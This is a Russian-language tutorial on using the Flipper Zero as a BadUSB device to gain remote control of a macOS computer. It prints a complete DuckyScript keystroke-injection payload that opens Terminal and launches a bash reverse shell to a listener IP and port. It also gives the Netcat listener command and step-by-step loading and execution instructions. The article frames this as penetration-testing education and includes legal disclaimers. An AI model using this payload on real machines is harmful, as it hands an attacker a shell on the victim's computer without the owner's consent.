В этой статье рассмотрим использование Flipper Zero в качестве устройства пентеста для проверки уязвимостей в целевой системе.
Используя Flipper Zero, короткий 12-строчный текстовый файл DuckyScript и удаленный прослушиватель (Listener) на сервере Ubuntu, можно запустить Reverse Shell на компьютере с macOS Ventura.
Запуск Reverse Shell на macOS может быть использован для различных целей, включая тестирование безопасности, удаленное управление системой и обучение кибербезопасности. В контексте пентеста, обратная оболочка может помочь идентифицировать уязвимости или слабые места в системе защиты. Однако, стоит отметить, что использование таких методов на чужих или корпоративных системах без явного разрешения может нарушать закон и этические нормы. Поэтому важно убедиться, что все действия проводятся в рамках закона и этических стандартов.
Flipper Zero — это многофункциональное портативное устройство, созданное для взаимодействия с цифровой техникой. Оно оснащено набором инструментов для анализа и модуляции различных видов беспроводных сигналов и интерфейсов.
Ключевые функции Flipper Zero включают в себя возможность работать с RFID, радиочастотными сигналами, инфракрасной связью и другими видами беспроводной связи. Это делает его полезным для исследования и тестирования безопасности, а также для хобби в сфере электроники и беспроводных технологий. Flipper Zero также имеет открытый исходный код, что позволяет пользователям настраивать и расширять его функционал согласно своим нуждам.
Flipper Zero BadUSB, как и другие устройства BadUSB, использует полезную нагрузку, написанную на DuckyScript – простом языке сценариев для выполнения нажатий клавиш на целевом компьютере.
Отправной точкой для полезных нагрузок Duckyscript является официальный сайт Hak5. Здесь вы найдете примеры и документацию по использованию DuckScript.
Написание скрипта DuckyScript
Вы можете использовать готовый сценарий, а можете научиться писать его самостоятельно. Мы покажем, как использовать обратную оболочку (Reverse Shell) на компьютере MacOS.
Откройте любой текстовый редактор и введите следующий текст. В macOS по умолчанию установлено приложение TextEdit, поэтому мы будем использовать его.
ID 05ac:021e Apple:Keyboard DELAY 1000 GUI SPACE DELAY 200 STRING terminal DELAY 200 ENTER DELAY 1000 STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 DELAY 1000 ENTER DELAY 1000
Для нашего эксперимента необязательно хорошо знать DuckyScript, поэтому мы рассмотрим только 6 команд, которые использует наш скрипт.
Измените IP-адрес 10.10.10.157 и порт 4444 на IP-адрес и порт вашего сервера. Сохраните этот файл на свой диск как rev_shell_macos.txt. В каталоге badusb Flipper Zero нет организации подкаталогов, поэтому, если вы используете несколько полезных нагрузок для разных операционных систем, используйте соглашение об именах.
Если вы еще не установили приложение qflipper, перейдите на официальную страницу обновления Flipper Zero и выберите установщик для вашей операционной системы.
Откройте приложение qflipper и выберите значок папки, выделенный красным на скриншоте.
Выберите и дважды щелкните значок SD-карты, чтобы просмотреть содержимое.
Найдите и перетащите файл rev_shell_macos.txt, который мы создали ранее, в папку badusb.
Отключите Flipper Zero от компьютера после завершения копирования файла.
BadUSB из Flipper Zero готов к использованию. Но сначала нам нужно настроить удаленный прослушиватель на нашем сервере. На сервере Ubuntu запустите прослушиватель Netcat listener с помощью следующей команды:
$ nc -nlvp 4444
Разбивка команды приведена в следующей таблице. Опять же, вам не обязательно знать, что происходит при использовании команды, кроме того, что она ожидает входящего соединения.
Теперь, когда Netcat listener готов и ожидает входящего соединения, мы можем приступить к атаке BadUSB.
Самое сложное уже сделано. Файл BadUSB reverse_shell_macos.txt записывается, перемещается во Flipper Zero, и прослушиватель Netcat ожидает соединения.
Перейдите в меню «Bad USB».
Перейдите к файлу DuckyScript, который мы скопировали ранее. Если вы не видите этот файл, значит, вы скопировали его не в тот каталог или не использовали расширение имени файла .txt. Выберите rev_shell_macos и нажмите кнопку «Run».
Когда вы увидите предупреждение Connect to USB, вы можете подключить Flipper Zero к USB-порту iMac или MacBook. Нажмите кнопку «Run».
Вы можете наблюдать за ходом выполнения сценария BadUSB в главном окне. Как только статус достигнет 100%, полезная нагрузка будет завершена, и вы сможете отключить Flipper Zero.
Если вы наблюдаете за монитором компьютера iMac, вы можете увидеть эксплойт, выполняющий DuckyScript. Прослушиватель Netcat на сервере Ubuntu отображает результаты успешного запроса.
Теперь у вас есть контроль над компьютером MacOS через обратную оболочку. Работая в Linux, вы можете использовать инструменты командной строки Unix и оболочку BASH так, как если бы у вас была физическая клавиатура iMac.
Вы можете использовать обычные команды Linux, такие как whoami, pwd, ls или cd для навигации по файловой системе и управления операционной системой.
Теперь, когда вы понимаете, как Flipper Zero работает как устройство BadUSB, вы можете создавать свои собственные сценарии. Используйте сайт Hak5 или один из множества репозиториев DuckyScript на GitHub в качестве отправной точки для ваших собственных файлов Duckyscript. Действуйте этично и в рамках закона. Используйте BadUSB на устройствах, которыми вы владеете или имеете разрешение для подобного использования.
Никаких овечек — только отборные научные факты